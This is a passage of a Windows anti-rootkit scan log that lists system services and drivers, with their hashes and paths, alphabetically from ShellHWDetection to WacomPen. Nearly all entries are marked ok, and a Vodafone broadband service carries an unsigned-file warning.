21:54:43.0070 0x1f20 [ 414DA952A35BF5D50192E28263B40577, 9C9BAFB9880DA6CC728506A142BE124E186219610DCC3460657A3CA93C865DF1 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
21:54:43.0164 0x1f20 ShellHWDetection - ok
21:54:43.0195 0x1f20 [ 2565CAC0DC9FE0371BDCE60832582B2E, 1A775214E86B83C2F1799F12D71077D81C89AD32734A248BA88787B7F104B79D ] sisagp          C:\Windows\system32\drivers\sisagp.sys
21:54:43.0258 0x1f20 sisagp - ok
21:54:43.0289 0x1f20 [ A9F0486851BECB6DDA1D89D381E71055, 7E909538AB758C18AC2CCBFFEE17BA36FA6ED2E674AA70924AA87AC61375FF35 ] SiSRaid2        C:\Windows\system32\DRIVERS\SiSRaid2.sys
21:54:43.0304 0x1f20 SiSRaid2 - ok
21:54:43.0320 0x1f20 [ 3727097B55738E2F554972C3BE5BC1AA, 75D52A596A298C33EC79A3B0B80F25492C08A182ABC679401502DA9597687566 ] SiSRaid4        C:\Windows\system32\DRIVERS\sisraid4.sys
21:54:43.0351 0x1f20 SiSRaid4 - ok
21:54:43.0367 0x1f20 [ 3E21C083B8A01CB70BA1F09303010FCE, 803F8F91299C387110F34A49340E7136AAE91B418E2977A36285EA8F432FF197 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
21:54:43.0398 0x1f20 Smb - ok
21:54:43.0788 0x1f20 [ A58CFA1B9D223B1E13F756CFC3DD8F63, 320618EAA1814EE16E64B0D172F16D40D0476C108351227717565B174451FDB8 ] SmcService      C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
21:54:43.0850 0x1f20 SmcService - ok
21:54:43.0897 0x1f20 [ 5DF21EEECC50A04FAA2E771E6728543D, 2AC6DE4554E1F7F79AF321201F3BA99802F1D756393E76700A73B0BFC0E8FAC1 ] SNAC            C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE
21:54:43.0913 0x1f20 SNAC - ok
21:54:43.0960 0x1f20 [ 6A984831644ECA1A33FFEAE4126F4F37, 753E23D2B33D47C52C05D892B052CFD96D93B97FB6E9FCB58EF1E4C4A125BF78 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
21:54:43.0991 0x1f20 SNMPTRAP - ok
21:54:44.0069 0x1f20 [ E87CF104F12C92401C4D33C50A3D5DC8, AFC0360F7588EBDD072465B1AD1F54C673DCF65BB1B8DBF40576AA47D7218C71 ] SPBBCDrv        C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys
21:54:44.0100 0x1f20 SPBBCDrv - ok
21:54:44.0131 0x1f20 [ 95CF1AE7527FB70F7816563CBC09D942, CE8BACB91A5A86CBCE82619C6C1873B4D7593B00CED3B522E41B8F7F6258CC65 ] spldr           C:\Windows\system32\drivers\spldr.sys
21:54:44.0162 0x1f20 spldr - ok
21:54:44.0209 0x1f20 [ 9AEA093B8F9C37CF45538382CABA2475, CC63239C412067AA72318ADB8BB80BCDF2CA60DA05D814D32753C92508BC16A8 ] Spooler         C:\Windows\System32\spoolsv.exe
21:54:44.0256 0x1f20 Spooler - ok
21:54:44.0396 0x1f20 [ CF87A1DE791347E75B98885214CED2B8, 7AF4E03D751C951A4E5FBA28200DABFE6B3BF055490163EEEEA84EBA4D0F368A ] sppsvc          C:\Windows\system32\sppsvc.exe
21:54:44.0537 0x1f20 sppsvc - ok
21:54:44.0584 0x1f20 [ B0180B20B065D89232A78A40FE56EAA6, 4D045B23AD58A8822BE9F20119744A8D47455469D54494745CEB099951DA60FF ] sppuinotify     C:\Windows\system32\sppuinotify.dll
21:54:44.0615 0x1f20 sppuinotify - ok
21:54:44.0677 0x1f20 [ 14389E87D0D2E25B12BF2CC74CFAEE07, CB4080D0508D368C5510777304B7799C03BCE5F2EC4F2322595C5349A0C90743 ] SRTSP           C:\Windows\system32\Drivers\SRTSP.SYS
21:54:44.0708 0x1f20 SRTSP - ok
21:54:44.0755 0x1f20 [ AED0F68C185FE698A21CEFCD76F0B8A4, B6D1C08259140099AA5B4BB48927E7D69A7AAC8B40C9A8E0709B03B8FEB77D2D ] SRTSPL          C:\Windows\system32\Drivers\SRTSPL.SYS
21:54:44.0802 0x1f20 SRTSPL - ok
21:54:44.0849 0x1f20 [ 0E2CA6326726477FE29863808BBAD413, FAE8E039C119092DB8D56BEB0C09AB5932E9287BD35C403E8BA4B4A2D5F14EA8 ] SRTSPX          C:\Windows\system32\Drivers\SRTSPX.SYS
21:54:44.0864 0x1f20 SRTSPX - ok
21:54:44.0896 0x1f20 [ E4C2764065D66EA1D2D3EBC28FE99C46, 043AEF06A23069DD17675955C834690A5FD8F1948A05B3969F977E823C4E25F5 ] srv             C:\Windows\system32\DRIVERS\srv.sys
21:54:44.0958 0x1f20 srv - ok
21:54:44.0989 0x1f20 [ 03F0545BD8D4C77FA0AE1CEEDFCC71AB, 4DF31206DF8F33C2975E23C7257ED930C4EDA8BC4E246D8FDA130BB583083ED0 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
21:54:45.0020 0x1f20 srv2 - ok
21:54:45.0052 0x1f20 [ E00FDFAFF025E94F9821153750C35A6D, 6ECDC5F314A29B859B0DCB7FF114CACE0718612556299B16412C21F9539DC9B5 ] SrvHsfHDA       C:\Windows\system32\DRIVERS\VSTAZL3.SYS
21:54:45.0083 0x1f20 SrvHsfHDA - ok
21:54:45.0130 0x1f20 [ CEB4E3B6890E1E42DCA6694D9E59E1A0, 00D841690A88F1051A238F67AACCE905E8A59C86070F215A8D31FA3E68C6BF35 ] SrvHsfV92       C:\Windows\system32\DRIVERS\VSTDPV3.SYS
21:54:45.0208 0x1f20 SrvHsfV92 - ok
21:54:45.0254 0x1f20 [ BC0C7EA89194C299F051C24119000E17, F5FB21F7AD7370F3D5DF7C23F33118ECF19865B995AF12E9A8A8D893E7E6264F ] SrvHsfWinac     C:\Windows\system32\DRIVERS\VSTCNXT3.SYS
21:54:45.0286 0x1f20 SrvHsfWinac - ok
21:54:45.0332 0x1f20 [ BE6BD660CAA6F291AE06A718A4FA8ABC, CD38939CFBA80B882D38099194FC1EBAE15A9D27A4D941DD03C55EC745E52E59 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
21:54:45.0364 0x1f20 srvnet - ok
21:54:45.0395 0x1f20 [ D887C9FD02AC9FA880F6E5027A43E118, F38BAD90EC791368C37C21090302708D2DFB83ECE9096609AD9AA667B2E5592E ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
21:54:45.0426 0x1f20 SSDPSRV - ok
21:54:45.0457 0x1f20 [ D318F23BE45D5E3A107469EB64815B50, D74355E6FF215AA8CE53BC9DF16AF2740F2FC2FD754939478A3608BDA8C6DDA0 ] SstpSvc         C:\Windows\system32\sstpsvc.dll
21:54:45.0488 0x1f20 SstpSvc - ok
21:54:45.0520 0x1f20 [ 585FDB94DB04AC1C56298D1FD1F1389E, 5CEBAAF3B649E580B3EF2B9B38426D6EE13B244BE1274BA0C0A468EC4CFB680C ] ssudmdm         C:\Windows\system32\DRIVERS\ssudmdm.sys
21:54:45.0551 0x1f20 ssudmdm - ok
21:54:45.0613 0x1f20 [ A58068234916A4655457CA7DFA9B59CA, FA0146307DE6C53D2B90E35D222E0CBC0DD4D67A8F894F1C75A35D8E4BEDA024 ] ssudobex        C:\Windows\system32\DRIVERS\ssudobex.sys
21:54:45.0644 0x1f20 ssudobex - ok
21:54:45.0754 0x1f20 [ FE7F776F2590C8331123BDA3A3A21DE6, B227C86077B073B78739E9FD2C79CEAFF6AC7AAAC51C249F8198CA4D9F1B5708 ] STacSV          C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\STacSV.exe
21:54:45.0800 0x1f20 STacSV - ok
21:54:45.0832 0x1f20 [ DB32D325C192B801DF274BFD12A7E72B, F089DBA719E22BC269720A6B840B873A4AF5639745DB0C3DBC8BD2F2839A1ABA ] stexstor        C:\Windows\system32\DRIVERS\stexstor.sys
21:54:45.0863 0x1f20 stexstor - ok
21:54:45.0925 0x1f20 [ DADB74BF26766757DBBA9C5912969EBF, 74C5287CE969C9AECC42805AF20D8AAFA35FC3AC1B44DE46008A7324D31B2BFB ] STHDA           C:\Windows\system32\DRIVERS\stwrt.sys
21:54:45.0972 0x1f20 STHDA - ok
21:54:46.0034 0x1f20 [ E1FB3706030FB4578A0D72C2FC3689E4, A62EC9AA4514CAF2A10C0A3AEF7A36F593A7E7DA370A3F130C24E1B612E19427 ] StiSvc          C:\Windows\System32\wiaservc.dll
21:54:46.0066 0x1f20 StiSvc - ok
21:54:46.0097 0x1f20 [ E58C78A848ADD9610A4DB6D214AF5224, 1575A90EB22A4FB066459BDA00C6CAC10198C3C8C74493721EC6D34B51F50426 ] swenum          C:\Windows\system32\drivers\swenum.sys
21:54:46.0112 0x1f20 swenum - ok
21:54:46.0144 0x1f20 [ A28BD92DF340E57B024BA433165D34D7, 889CC7FF143C3549982128473FF927CD80CF36485A347EF399C1271C8CE12CE4 ] swprv           C:\Windows\System32\swprv.dll
21:54:46.0206 0x1f20 swprv - ok
21:54:46.0315 0x1f20 [ 96900995907415FB4A8A18D97B3AA4A3, 17FF7E12F59FB269542B60E1BE7922065535120F066C59EE05BD927DDACBF9D9 ] Symantec AntiVirus C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
21:54:46.0378 0x1f20 Symantec AntiVirus - ok
21:54:46.0424 0x1f20 [ E42A34E6F5CA71A84D4C2DE620AAD13D, 91CA59A9F060ACD6373524D3C1CE10FD12594E7B502D44B827BDE426BF36D96E ] SymEvent        C:\Windows\system32\Drivers\SYMEVENT.SYS
21:54:46.0440 0x1f20 SymEvent - ok
21:54:46.0487 0x1f20 [ 394B2368212114D538316812AF60FDDD, 74DAC801C692DD858EF2A410D99D9E0DE565599436A8F80D7B39818F062B943F ] SYMREDRV        C:\Windows\System32\Drivers\SYMREDRV.SYS
21:54:46.0518 0x1f20 SYMREDRV - ok
21:54:46.0549 0x1f20 [ D46676BB414C7531BDFFE637A33F5033, BDF9792FB05455B7B5600063CFC783802F7948ABF614AD74D20CDB0BAAC86D11 ] SYMTDI          C:\Windows\System32\Drivers\SYMTDI.SYS
21:54:46.0580 0x1f20 SYMTDI - ok
21:54:46.0674 0x1f20 [ 36650D618CA34C9D357DFD3D89B2C56F, 7C3774E53DCF32CB3A4B3504E32D2A651E18467FA0A6AC4C7993C696741B704B ] SysMain         C:\Windows\system32\sysmain.dll
21:54:46.0752 0x1f20 SysMain - ok
21:54:46.0830 0x1f20 [ 83FBA2CE9843DB015C381CF24B8E620C, 32723DFDD661D019A641D4ABE7AA3504B96C041B744FC0DF28F7AAA2924A8385 ] SysPlant        C:\Windows\SYSTEM32\Drivers\SysPlant.sys
21:54:46.0861 0x1f20 SysPlant - ok
21:54:46.0892 0x1f20 [ 763FECDC3D30C815FE72DD57936C6CD1, 1A62C7E63E426D56894F4121C75D9C60FC9A14469ADBD0D6F0B94B8DE48CDA3E ] TabletInputService C:\Windows\System32\TabSvc.dll
21:54:46.0955 0x1f20 TabletInputService - ok
21:54:47.0002 0x1f20 [ 613BF4820361543956909043A265C6AC, FCFF02E466D2501630B452627FB218C01E5245A0921EE3D2117E7FD63AC7E98E ] TapiSrv         C:\Windows\System32\tapisrv.dll
21:54:47.0080 0x1f20 TapiSrv - ok
21:54:47.0111 0x1f20 [ B799D9FDB26111737F58288D8DC172D9, 409A60819A4305699E2E492A6190637FAAEBD19E745A5DB2A5D6977106C86591 ] TBS             C:\Windows\System32\tbssvc.dll
21:54:47.0173 0x1f20 TBS - ok
21:54:47.0282 0x1f20 [ 5579DD18546999F5D0EC39D018726C6B, 82432BACEE75C34F21222D9CC1607223C2940947118A63DB239777A4B1442AD3 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
21:54:47.0376 0x1f20 Tcpip - ok
21:54:47.0438 0x1f20 [ 5579DD18546999F5D0EC39D018726C6B, 82432BACEE75C34F21222D9CC1607223C2940947118A63DB239777A4B1442AD3 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
21:54:47.0485 0x1f20 TCPIP6 - ok
21:54:47.0516 0x1f20 [ 3EEBD3BD93DA46A26E89893C7AB2FF3B, 2C7204DCD2BCBC6A250FF0F6477616F327AF41FDB7CABE69E5C357361009FB4E ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
21:54:47.0532 0x1f20 tcpipreg - ok
21:54:47.0563 0x1f20 [ 1CB91B2BD8F6DD367DFC2EF26FD751B2, 879E2827354BB21573AC6A7CCEB746D44214540687E6882FFCB4089546FBD954 ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
21:54:47.0579 0x1f20 TDPIPE - ok
21:54:47.0594 0x1f20 [ 2C2C5AFE7EE4F620D69C23C0617651A8, E828D974C3F9D7004A030C3AD448096C736FDB4C4C1707D043E567D08C845103 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
21:54:47.0610 0x1f20 TDTCP - ok
21:54:47.0641 0x1f20 [ 7FE680A3DFA421C4A8E4879AE4C5AAB0, A4C64E155AB2843823CD3586756BA7681CFDEA50812095468221503BBAD30DCD ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
21:54:47.0688 0x1f20 tdx - ok
21:54:47.0750 0x1f20 [ 75346634D815C9FDA103AE5FADA072B3, CE5EAE1C2DBAEA5785FFBA08A5A5515B6D8C9E35F27005C2C70FB1A49A361A8C ] Teefer2         C:\Windows\system32\DRIVERS\teefer2.sys
21:54:47.0766 0x1f20 Teefer2 - ok
21:54:47.0797 0x1f20 [ 04DBF4B01EA4BF25A9A3E84AFFAC9B20, 0D81B427720637882077C5024D738191F858FC734ED040697872D906351EF663 ] TermDD          C:\Windows\system32\drivers\termdd.sys
21:54:47.0828 0x1f20 TermDD - ok
21:54:47.0891 0x1f20 [ FCFD4F50419B4BC72E80066DA10D2E54, 7C2314A57A404525F0444986332DBAE0964A3359374671598387051D7AAE72AE ] TermService     C:\Windows\System32\termsrv.dll
21:54:47.0969 0x1f20 TermService - ok
21:54:48.0000 0x1f20 [ 42FB6AFD6B79D9FE07381609172E7CA4, B57C85091209A2FAD19ED490B8FA7FC98F12911F9C9CACE9AF1E540780CE6700 ] Themes          C:\Windows\system32\themeservice.dll
21:54:48.0031 0x1f20 Themes - ok
21:54:48.0062 0x1f20 [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] THREADORDER     C:\Windows\system32\mmcss.dll
21:54:48.0094 0x1f20 THREADORDER - ok
21:54:48.0312 0x1f20 [ 3144B3FAF519AF2914629FE11A53CDE5, 50E03666625C8FA949F6D7AA09D19569D40989B7B7A63F87C89EEDBA54C327AB ] TracSrvWrapper C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe
21:54:48.0452 0x1f20 TracSrvWrapper - ok
21:54:48.0499 0x1f20 [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A, 532A3A812578B2DFD83001DE66FC73689D79EC729409EB572E07E6D65B281712 ] TrkWks          C:\Windows\System32\trkwks.dll
21:54:48.0546 0x1f20 TrkWks - ok
21:54:48.0593 0x1f20 [ 2C49B175AEE1D4364B91B531417FE583, 6C7995E18F84E465C376D1D5F153C15ACB66CDEA86EE5BF186677F572E7E129B ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
21:54:48.0686 0x1f20 TrustedInstaller - ok
21:54:48.0733 0x1f20 [ 6C5139E4283249518F7743D7043775B3, 58684E8C90EBAC65459A97C905CDCFE3A915CFF7E8E96071DE1AC3489F85E67F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
21:54:48.0842 0x1f20 tssecsrv - ok
21:54:48.0889 0x1f20 [ C6A5FBD4977305E1FA23E02C042DB463, A6EB5E4B8051A258D40A385609E930318EAA3494C8466F48542B806FE6A7C47A ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
21:54:48.0952 0x1f20 TsUsbFlt - ok
21:54:48.0998 0x1f20 [ B2FA25D9B17A68BB93D58B0556E8C90D, 0146931B733CAB1CD87F94C35F97E110D6ED6C55EAFF03345400A29AEDE99BDE ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
21:54:49.0061 0x1f20 tunnel - ok
21:54:49.0092 0x1f20 [ 750FBCB269F4D7DD2E420C56B795DB6D, E1A95C59148FE463539C34336FD0E74B31A33B8AB2B8E34AA10349C3347471D7 ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
21:54:49.0123 0x1f20 uagp35 - ok
21:54:49.0154 0x1f20 [ EE43346C7E4B5E63E54F927BABBB32FF, BAD6FC3BEE45E644D5A6A0A31428F5B2AEC72A0AA0C74EF8177B1FE23EEF3AA9 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
21:54:49.0201 0x1f20 udfs - ok
21:54:49.0279 0x1f20 [ D1D70D3A1AE2282448D7DED10C37F8C9, 915B6F17272365E2A0F7107D28D0631120613F0908D34B351F7B3AAA1955A476 ] UI Assistant Service C:\Program Files\Reliance 3G\AssistantServices.exe
21:54:49.0310 0x1f20 UI Assistant Service - ok
21:54:49.0342 0x1f20 [ 8344FD4FCE927880AA1AA7681D4927E5, 1B54EFA60A221E2B9FFE59BB41C7E7D8B5AC6826F1C5577456D81371D464255A ] UI0Detect       C:\Windows\system32\UI0Detect.exe
21:54:49.0388 0x1f20 UI0Detect - ok
21:54:49.0404 0x1f20 [ 44E8048ACE47BEFBFDC2E9BE4CBC8880, 5D96D90FDF68AE470CC92CA9DF9DA2C05A53EF455A5A109DBBF7C96F3238257C ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
21:54:49.0420 0x1f20 uliagpkx - ok
21:54:49.0466 0x1f20 [ D295BED4B898F0FD999FCFA9B32B071B, D4130DB4AE76EE6DC0B8E7A4FEF5CB8B26EBD822C21021F6FA78FD29C1E211C2 ] umbus           C:\Windows\system32\drivers\umbus.sys
21:54:49.0513 0x1f20 umbus - ok
21:54:49.0544 0x1f20 [ 7550AD0C6998BA1CB4843E920EE0FEAC, 24C001E422C3B3B920CDCF6003A3179CE464DE4284775403DD5122EF9780460D ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
21:54:49.0591 0x1f20 UmPass - ok
21:54:49.0622 0x1f20 [ 833FBB672460EFCE8011D262175FAD33, C0C3067A305993CBF056C229771CB0593DD60C9C7AC5130FF1CA610BCA812AB5 ] upnphost        C:\Windows\System32\upnphost.dll
21:54:49.0669 0x1f20 upnphost - ok
21:54:49.0700 0x1f20 [ 0803FBA9FE829D61AE26EC0BCC910C46, 30D00E2C7DFC630C99C1599587D4F9C272BC30D444E07C961AA05BF84587806B ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
21:54:49.0763 0x1f20 usbccgp - ok
21:54:49.0778 0x1f20 [ 2352AB5F9F8F097BF9D41D5A4718A041, 25BC7828C625B9B2A5110C25B230C5828CEC18EC97ECF9EC4745E8930CBF472C ] usbcir          C:\Windows\system32\drivers\usbcir.sys
21:54:49.0841 0x1f20 usbcir - ok
21:54:49.0888 0x1f20 [ D40855F89B69305140BBD7E9A3BA2DA6, 745DC6D770666F6B19C2B6AA89C21D1A314732E291453BFA2367F9AF86F97C3C ] usbehci         C:\Windows\system32\drivers\usbehci.sys
21:54:49.0919 0x1f20 usbehci - ok
21:54:49.0950 0x1f20 [ EDF2DF71C4F1E13A6AC75F5224DE655A, 1764D155C6B99201774B57195349304259232A12868ECFC2069CA49443EBDC2C ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
21:54:49.0997 0x1f20 usbhub - ok
21:54:50.0012 0x1f20 [ 9828C8D14CC2676421778F0DE638CF97, 479A28211FFB85190A01FAB0283B927588805D2C0CDB03F85F8F814B88E4F453 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
21:54:50.0044 0x1f20 usbohci - ok
21:54:50.0059 0x1f20 [ 797D862FE0875E75C7CC4C1AD7B30252, 1BBE745E4C85F8911076F6032ACD7A35FAC048D3CB1500C64E08D8B2C70A1069 ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
21:54:50.0075 0x1f20 usbprint - ok
21:54:50.0137 0x1f20 [ F991AB9CC6B908DB552166768176896A, AD8E7A16B23B244B7F834622D4E38B5844193C6E31EF96F61E0E2EA16C945026 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
21:54:50.0153 0x1f20 USBSTOR - ok
21:54:50.0168 0x1f20 [ 800AABFD625EEFF899F7E5496BDE37AB, 3EB7ED07760CB348FCA9A06C2B838EF79B51A83C5F70A9C9EAAEAE54480067E2 ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
21:54:50.0200 0x1f20 usbuhci - ok
21:54:50.0262 0x1f20 [ DE014425522610BEDCA3821BB8C0F1D5, D6FEA0DF07F89834AEEE8C02CC7FD41068D758B6CCECE2EEE5CF4B9DB646FA1E ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
21:54:50.0309 0x1f20 usbvideo - ok
21:54:50.0371 0x1f20 [ AF77716205C97E902E6C5B78DECE2CCA, ED99EABED1C7F323EE2A76413E2B260F8EE1D76FDF1E60EE35136D060E756735 ] usb_rndisx      C:\Windows\system32\DRIVERS\usb8023x.sys
21:54:50.0418 0x1f20 usb_rndisx - ok
21:54:50.0449 0x1f20 [ 081E6E1C91AEC36758902A9F727CD23C, 9FDAA17A3B99067E035E5D76305427F15FFDBC5D304B2BB78AFC6463EDDE1A75 ] UxSms           C:\Windows\System32\uxsms.dll
21:54:50.0496 0x1f20 UxSms - ok
21:54:50.0512 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] VaultSvc        C:\Windows\system32\lsass.exe
21:54:50.0527 0x1f20 VaultSvc - ok
21:54:50.0543 0x1f20 [ A059C4C3EDB09E07D21A8E5C0AABD3CB, BDD3729B49DF2E2FC72FFEF9D10235B481A671DE5A721B6B9A80873B7A343F07 ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
21:54:50.0558 0x1f20 vdrvroot - ok
21:54:50.0605 0x1f20 [ C3CD30495687C2A2F66A65CA6FD89BE9, 582E4706C1D6A151020D14B26C7BF166F4E42BDD6E410F30EC452469270C5E9B ] vds             C:\Windows\System32\vds.exe
21:54:50.0699 0x1f20 vds - ok
21:54:50.0730 0x1f20 [ 17C408214EA61696CEC9C66E388B14F3, 829C0416672E2B2DFABCFE641E7F281F41E8DBB3C0EF11C7784CB9BB94F87E97 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
21:54:50.0746 0x1f20 vga - ok
21:54:50.0761 0x1f20 [ 8E38096AD5C8570A6F1570A61E251561, 4DBA3C1397A2203548F45F006E66D99F837903F601ABBCE2304754F783CA8A39 ] VgaSave         C:\Windows\System32\drivers\vga.sys
21:54:50.0792 0x1f20 VgaSave - ok
21:54:50.0839 0x1f20 [ 5461686CCA2FDA57B024547733AB42E3, 2721D0659AA890172FCAD4EC4D926B58ACD0EE4887DA51545DC7237420D5BF84 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
21:54:50.0870 0x1f20 vhdmp - ok
21:54:50.0902 0x1f20 [ C829317A37B4BEA8F39735D4B076E923, 55D1796AE750071E1E05BD7702B6C355CCFFE27B4C00E93E7044C3184732B497 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
21:54:50.0933 0x1f20 viaagp - ok
21:54:50.0948 0x1f20 [ E02F079A6AA107F06B16549C6E5C7B74, B530DCE3EE4F285B3D5F69F7148D17E016D54F04E6F93706B829A34567748788 ] ViaC7           C:\Windows\system32\DRIVERS\viac7.sys
21:54:50.0980 0x1f20 ViaC7 - ok
21:54:51.0011 0x1f20 [ E43574F6A56A0EE11809B48C09E4FD3C, 3687BF638E21C00E62ABFED70D728B91ADA08F7164CA898E654F31DA196589E9 ] viaide          C:\Windows\system32\drivers\viaide.sys
21:54:51.0042 0x1f20 viaide - ok
21:54:51.0136 0x1f20 [ 17E43BEC5EE81CAB00A00EC306A350A9, 7D40B6A7217CC24FFDB9C351ACDBF12BBD8F719D46E86F198C85BBD36582105E ] VmbService      C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
21:54:51.0151 0x1f20 VmbService - detected UnsignedFile.Multi.Generic ( 1 )
21:54:56.0190 0x1f20 VmbService ( UnsignedFile.Multi.Generic ) - warning
21:55:09.0466 0x1f20 [ 48007916B1D0DAB3E6C0D701DE7C4AFB, 8DA5734A51881E93F0B8D79C0B9956321212D986DDCA9A09EE21E729C564A818 ] vna_ap          C:\Windows\system32\DRIVERS\vnaap.sys
21:55:09.0497 0x1f20 vna_ap - ok
21:55:09.0544 0x1f20 [ 99D9EA024462C5AB369299F794C0BAB7, 76ADC199C822FF3D7D8A222EC7EA7A1DA4B1C0EA87F0F560F98C37F271DE3AD4 ] vodafone_K3805-z_dc_enum C:\Windows\system32\DRIVERS\vodafone_K3805-z_dc_enum.sys
21:55:09.0606 0x1f20 vodafone_K3805-z_dc_enum - ok
21:55:09.0637 0x1f20 [ 3AD0D0044A4F2AD80F368BB9293FFEE5, 27F798DAE17F2F0A53DD206EF016FCDEE3C28B34D51855CCFC79C1BDFF42C7FD ] vodafone_zte_cdc_acm C:\Windows\system32\DRIVERS\vodafone_zte_cdc_acm.sys
21:55:09.0684 0x1f20 vodafone_zte_cdc_acm - ok
21:55:09.0715 0x1f20 [ 83E9661BC716BF1BFEA7A6A6273A4CEC, DBE47E872F863E42BB4DF0CA5572735152506F55B5333D2E3C132BC2370351BB ] vodafone_zte_cdc_ecm C:\Windows\system32\DRIVERS\vodafone_zte_cdc_ecm.sys
21:55:09.0746 0x1f20 vodafone_zte_cdc_ecm - ok
21:55:09.0793 0x1f20 [ ECE758F4838DF809E116CFD401D503A4, D8026B674EC57DA99FB3094FEE33DACAB4142ECCB64865360431B6CB369DD1E1 ] vodafone_zte_cpo C:\Windows\system32\DRIVERS\vodafone_zte_cpo.sys
21:55:09.0824 0x1f20 vodafone_zte_cpo - ok
21:55:09.0871 0x1f20 [ 565B78A7CA79B32369B9E734C653DE36, F9D3352CE98AD7E41908BDDB07B107FBE7DD28A9F706C56E5C79E5AADDBA4C1D ] vodafone_zte_ecm_enum C:\Windows\system32\DRIVERS\vodafone_zte_ecm_enum.sys
21:55:09.0902 0x1f20 vodafone_zte_ecm_enum - ok
21:55:09.0934 0x1f20 [ 565B78A7CA79B32369B9E734C653DE36, F9D3352CE98AD7E41908BDDB07B107FBE7DD28A9F706C56E5C79E5AADDBA4C1D ] vodafone_zte_ecm_enum_filter C:\Windows\system32\DRIVERS\vodafone_zte_ecm_enum_filter.sys
21:55:09.0965 0x1f20 vodafone_zte_ecm_enum_filter - ok
21:55:09.0980 0x1f20 [ 4C63E00F2F4B5F86AB48A58CD990F212, 9796BD4B9CFEEEAF57C5E332A732EFC2770B21F9B35301A5D202F5FC52C1E035 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
21:55:10.0012 0x1f20 volmgr - ok
21:55:10.0058 0x1f20 [ B5BB72067DDDDBBFB04B2F89FF8C3C87, 65B9AD55F43940A5FDD88B6EC5034A7E375DF8E6F5F1AE6519A4BD6B7E992EBC ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
21:55:10.0105 0x1f20 volmgrx - ok
21:55:10.0121 0x1f20 [ F497F67932C6FA693D7DE2780631CFE7, DAE544ED99D2CF570DA31343BD87D2F856D0D13529656D38E1BF854C77F017F6 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
21:55:10.0152 0x1f20 volsnap - ok
21:55:10.0183 0x1f20 [ CBB914AB2D5166B3F2AC390041984D41, E61B9A55480087C75549D18B81D06759DCB37D162BBAD33F0C126E10C3E97B05 ] vsdatant        C:\Windows\system32\DRIVERS\vsdatant.sys
21:55:10.0214 0x1f20 vsdatant - ok
21:55:10.0246 0x1f20 [ 9DFA0CC2F8855A04816729651175B631, 37FD9E43A2A3F125E94A315FB4CD8A1B5499A5FD74806EB2D1E5DA88C070D3A3 ] vsmraid         C:\Windows\system32\DRIVERS\vsmraid.sys
21:55:10.0261 0x1f20 vsmraid - ok
21:55:10.0339 0x1f20 [ 209A3B1901B83AEB8527ED211CCE9E4C, 1A431F6409F8E0531F600F8F988ECECECB902DA26BBAAF1DE74A5CAC29A7CB44 ] VSS             C:\Windows\system32\vssvc.exe
21:55:10.0417 0x1f20 VSS - ok
21:55:10.0448 0x1f20 [ 90567B1E658001E79D7C8BBD3DDE5AA6, EFC23BEEA7F54A2DC56CB523DAD1AF0358D904C5278BF08873910E2DB3F13557 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
21:55:10.0464 0x1f20 vwifibus - ok
21:55:10.0495 0x1f20 [ 7090D3436EEB4E7DA3373090A23448F7, 3A130B28F2BFA7DCEC8596C4CE4E187B019F5ECF1AAC8DD1BBDE9CBD2428FEC2 ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
21:55:10.0526 0x1f20 vwififlt - ok
21:55:10.0573 0x1f20 [ 55187FD710E27D5095D10A472C8BAF1C, AE298E2D3BA366BCBDC092C717214C181E8843FA564A6DFB07FC3238A5A68DC3 ] W32Time         C:\Windows\system32\w32time.dll
21:55:10.0636 0x1f20 W32Time - ok
21:55:10.0651 0x1f20 [ DE3721E89C653AA281428C8A69745D90, 501C78056ED4295625D8A5412025FD2F0CA24077044D3A5800BA79DF3D946516 ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
21:55:10.0682 0x1f20 WacomPen - ok
